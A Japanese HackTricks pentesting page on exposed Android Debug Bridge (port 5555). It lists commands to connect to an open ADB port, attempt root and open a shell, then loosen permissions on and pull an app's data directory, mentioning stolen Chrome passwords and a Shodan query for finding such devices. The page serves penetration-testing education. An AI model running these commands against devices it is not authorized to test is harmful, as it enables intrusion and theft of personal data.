hacktricks/network-services-pentesting/5555-android-debug-bridge.md

4.7 KiB
Raw Blame History

5555 - Android Debug Bridge

AWSハッキングをゼロからヒーローまで学ぶには htARTE (HackTricks AWS Red Team Expert)をご覧ください!

HackTricksをサポートする他の方法:

基本情報

Android Debug Bridgeadbは、デバイスと通信するための多機能コマンドラインツールです。adbコマンドは、アプリのインストールやデバッグなど、さまざまなデバイスアクションを容易にし、デバイスでさまざまなコマンドを実行するために使用できるUnixシェルへのアクセスを提供します。(こちらから)

デフォルトポート: 5555。

PORT     STATE SERVICE VERSION
5555/tcp open  adb     Android Debug Bridge device (name: msm8909; model: N3; device: msm8909)

接続

ADBサービスがデバイスのポートで実行されていて、接続できる場合、システム内でシェルを取得できます:

adb connect 10.10.10.10
adb root # Try to escalate to root
adb shell

以下のページでさらに多くのADBコマンドを確認できます

{% content-ref url="../mobile-pentesting/android-app-pentesting/adb-commands.md" %} adb-commands.md {% endcontent-ref %}

アプリデータのダンプ

アプリケーションのデータを完全にダウンロードするためには、次のことができます:

# From a root console
chmod 777 /data/data/com.package
cp -r /data/data/com.package /sdcard Note: Using ADB attacker cannot obtain data directly by using command " adb pull /data/data/com.package". He is compulsorily required to move data to Internal storage and then he can pull that data.
adb pull "/sdcard/com.package"

このテクニックを使用して、Chromeのパスワードのような機密情報を取得することができます。これについての詳細は、こちらで提供されている情報と参考文献を確認してください。

Shodan

  • android debug bridge
AWSハッキングをゼロからヒーローまで学ぶには htARTE (HackTricks AWS Red Team Expert)をチェック!

HackTricksをサポートする他の方法: